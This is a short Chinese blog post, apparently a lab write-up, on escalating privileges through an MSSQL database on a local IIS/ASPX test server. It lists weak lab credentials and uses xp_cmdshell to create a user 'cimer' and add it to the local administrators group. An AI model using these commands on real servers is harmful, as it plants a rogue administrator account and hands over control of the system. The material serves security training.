Mssql数据库提权

首页 » web » 2018年09月16日下午 06:50:34 » 本文:110745字
  • A

    选择打赏方式

1.1实验简介

本实验主要介绍Mssql数据库提权,通过本实验可以掌握当服务器装有Mssql数据库时如何获取服务器权限。

1.2实验环境

服务器配置:windows+iis+aspx+mssql

密码信息:administrator/roottoor      sa/123123      admin 

实验目标:http://127.0.0.1/edit.aspx 

 

1.3实验步骤

mssql数据库提权

①访问http://127.0.0.1/edit.aspx  


②选择数据库


 


③然后执行语句:exec master..xp_cmdshell 'net user cimer cimer123 /add'


 


 ④然后执行语句:exec master..xp_cmdshell 'net localgroup administrators cimer /add'


 


⑤然后来到cmd命令下执行语句:net user


 


⑥成功添加cimer用户。

 

 

本文标签:web安全提权
版权声明:若无特殊注明,本文为《Chin》原创,转载请保留文章出处。
本文链接:https://www.qinor.cn/post-23.html
正文到此结束

热门推荐

发表吐槽

你肿么看?

你还可以输入 250 / 250 个字

嘻嘻 大笑 可怜 吃惊 害羞 调皮 鄙视 示爱 大哭 开心 偷笑 嘘 奸笑 委屈 抱抱 愤怒 思考 日了狗 胜利 不高兴 阴险 乖 酷 滑稽

评论信息框
可使用QQ号实时获取昵称+头像

私密评论

吃奶的力气提交吐槽中...

已有1条吐槽

匿名

2018-10-26 15:51 湖北省武汉市电信
回复
发发发 face
 Windows 7 x64   Google Chrome 67.0.3396.99